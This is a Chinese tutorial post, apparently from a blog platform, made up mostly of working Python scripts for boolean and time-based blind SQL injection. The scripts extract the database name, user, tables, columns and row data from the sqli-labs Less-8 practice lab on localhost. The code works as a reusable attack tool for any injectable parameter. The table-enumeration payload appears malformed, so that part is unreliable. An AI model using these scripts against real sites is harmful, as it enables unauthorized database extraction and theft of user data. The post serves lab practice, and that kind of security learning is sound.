sql盲注脚本

在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据

发现页面加载了3秒左右可以进行盲注

布尔盲注数据库名

python 复制代码
import requests


def inject_database(url):
    dataname=''
    for i in range(1,15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
            r = requests.get(url,path)
            if "You are in..........." in r.text:
                low = mid + 1
            else :
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)

if __name__=='__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_database(url)

结果

用时间盲注出用户名

python 复制代码
import requests
import time

def inject_user(url):
    user=''
    for i in range(1,15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "
            res = {"id":payload}
            start_time = time.time()
            r = requests.get(url,params=res)
            if (time.time() - start_time)>1:
                # 匹配成功
                low = mid + 1
            else :
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        user += chr(mid)
        print(user)

if __name__=='__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_user(url)

结果

用盲注的方式查询表、列、具体数据

python 复制代码
if __name__ == '__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    
    # 获取当前数据库名
    database_name = inject_database(url)
    print(f"Database name: {database_name}")
    
    # 获取数据库中的表名
    tables = inject_tables(url, database_name)
    print(f"Tables in database '{database_name}': {tables}")
    
    # 获取指定表中的列名
    table_name = 'users'  # 替换为目标表名
    columns = inject_columns(url, table_name)
    print(f"Columns in table '{table_name}': {columns}")
    
    # 获取指定表中特定列的数据
    column_name = 'username'  # 替换为目标列名
    data = inject_data(url, table_name, column_name)
    print(f"Data in column '{column_name}' of table '{table_name}': {data}")

时间检测模块

python 复制代码
# 发送请求并检查响应时间
def check_time_injection(url, payload):
    res = {"id": payload}
    start_time = time.time()
    r = requests.get(url, params=res)
    elapsed_time = time.time() - start_time
    return elapsed_time > 1  # 假设延迟超过1秒表示查询成功

数据库模块

python 复制代码
# 获取当前数据库名
def inject_database(url):
    dataname=''
    for i in range(1,15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
            res = {"id":payload}
            r = requests.get(url,params=res)
            if "You are in..........." in r.text:
                low = mid + 1
            else :
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)
    return dataname

数据库中表名模块

python 复制代码
# 获取指定数据库中的表名
def inject_tables(url, database_name):
    tables = []
    table_index = 0
    
    while True:
        table_index += 1
        table_name = ''
        for i in range(1, 20):  # 假设表名长度不超过20字符
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII码32为空格,通常表示结束
                break
            table_name += chr(low)
            print(f"Current table name: {table_name}")
        
        if table_name:
            tables.append(table_name)
            print(f"Found table: {table_name}")
        else:
            break
    
    return tables

列名模块

python 复制代码
def inject_columns(url, table_name):
    columns = []
    column_index = 0
    
    while True:
        column_index += 1
        column_name = ''
        for i in range(1, 20):  # 假设列名长度不超过20字符
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII码32为空格,通常表示结束
                break
            column_name += chr(low)
            print(f"Current column name: {column_name}")
        
        if column_name:
            columns.append(column_name)
            print(f"Found column: {column_name}")
        else:
            break
    
    return columns

指定查询数据模块

python 复制代码
# 获取指定表中特定列的数据
def inject_data(url, table_name, column_name):
    data = []
    row_index = 0
    
    while True:
        row_index += 1
        row_value = ''
        for i in range(1, 20):  # 假设数据长度不超过20字符
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII码32为空格,通常表示结束
                break
            row_value += chr(low)
            print(f"Current row value: {row_value}")
        
        if row_value:
            data.append(row_value)
            print(f"Found data: {row_value}")
        else:
            break
    
    return data

结果

数据库

user

相关推荐
炬火初现22 分钟前
SQL语句——高级字符串函数 / 正则表达式 / 子句
数据库·sql
TTGGGFF36 分钟前
云端服务器使用指南:利用Python操作mysql数据库
服务器·数据库·python
编程充电站pro1 小时前
SQL 性能优化:为什么少用函数在 WHERE 条件中?
数据库·sql
无敌最俊朗@1 小时前
通过Ubuntu和i.MX 6ULL开发板实现网络共享
服务器·数据库·ubuntu
TDengine (老段)1 小时前
TDengine 时序函数 DERIVATIVE 用户手册
大数据·数据库·sql·物联网·时序数据库·iot·tdengine
TDengine (老段)2 小时前
TDengine 时序函数 STATEDURATION 用户手册
大数据·数据库·sql·物联网·时序数据库·iot·tdengine
凯子坚持 c2 小时前
2025年大模型服务性能深度解析:从清华评测报告看蓝耘元生代MaaS平台的综合实力
大数据·数据库·人工智能
长安城没有风2 小时前
从入门到精通【Redis】理解Redis事务
数据库·redis·缓存
小园子的小菜2 小时前
MySQL 查询与更新语句执行过程深度解析:从原理到实践
数据库·mysql
老华带你飞3 小时前
学生信息管理系统|基于Springboot的学生信息管理系统设计与实现(源码+数据库+文档)
java·数据库·spring boot·后端·论文·毕设·学生信息管理系统